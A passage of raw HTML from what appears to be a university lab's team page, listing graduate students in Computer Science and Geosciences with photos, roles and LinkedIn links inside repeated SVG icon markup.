11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c342-outer\">\n <div data-colibri-id=\"182-c342\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c342 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c343\" class=\"d-block style-854 style-local-182-c343 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c343-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c343-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c344\" class=\"h-global-transition-all h-heading style-850 style-local-182-c344 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c344\">\n <!---->\n <!---->\n <h4 class=\"\">Ardavan Sassini</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c345\" class=\"h-text h-text-component style-851 style-local-182-c345 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c346\" class=\"h-text h-text-component style-902 style-local-182-c346 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c347\" class=\"style-855 style-local-182-c347 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c348-outer\">\n <div data-colibri-id=\"182-c348\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c348 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c349\" class=\"d-block style-854 style-local-182-c349 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c349-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c349-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c350\" class=\"h-global-transition-all h-heading style-850 style-local-182-c350 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c350\">\n <!---->\n <!---->\n <h4 class=\"\">Basit Damilare Amuda</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c351\" class=\"h-text h-text-component style-851 style-local-182-c351 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c352\" class=\"h-text h-text-component style-902 style-local-182-c352 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c353\" class=\"style-855 style-local-182-c353 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c354-outer\">\n <div data-colibri-id=\"182-c354\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c354 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c355\" class=\"d-block style-854 style-local-182-c355 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c355-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c355-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c356\" class=\"h-global-transition-all h-heading style-850 style-local-182-c356 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c356\">\n <!---->\n <!---->\n <h4 class=\"\">Sara Edwards</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c357\" class=\"h-text h-text-component style-851 style-local-182-c357 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c358\" class=\"h-text h-text-component style-902 style-local-182-c358 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c359\" class=\"style-855 style-local-182-c359 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c361-outer\">\n <div data-colibri-id=\"182-c361\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c361 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c362\" class=\"d-block style-854 style-local-182-c362 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c362-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c362-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c363\" class=\"h-global-transition-all h-heading style-850 style-local-182-c363 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c363\">\n <!---->\n <!---->\n <h4 class=\"\">Ryan Garland</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c364\" class=\"h-text h-text-component style-851 style-local-182-c364 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c365\" class=\"h-text h-text-component style-902 style-local-182-c365 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c366\" class=\"style-855 style-local-182-c366 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c367-outer\">\n <div data-colibri-id=\"182-c367\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c367 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c368\" class=\"d-block style-854 style-local-182-c368 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c368-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c368-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c369\" class=\"h-global-transition-all h-heading style-850 style-local-182-c369 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c369\">\n <!---->\n <!---->\n <h4 class=\"\">Jean Guo</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c370\" class=\"h-text h-text-component style-851 style-local-182-c370 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s student</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c371\" class=\"h-text h-text-component style-902 style-local-182-c371 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c373-outer\">\n <div data-colibri-id=\"182-c373\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c373 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c374\" class=\"d-block style-854 style-local-182-c374 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c374-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c374-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c375\" class=\"h-global-transition-all h-heading style-850 style-local-182-c375 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c375\">\n <!---->\n <!---->\n <h4 class=\"\">Angelique Willis</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c376\" class=\"h-text h-text-component style-851 style-local-182-c376 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c377\" class=\"h-text h-text-component style-902 style-local-182-c377 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c378\" class=\"style-855 style-local-182-c378 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>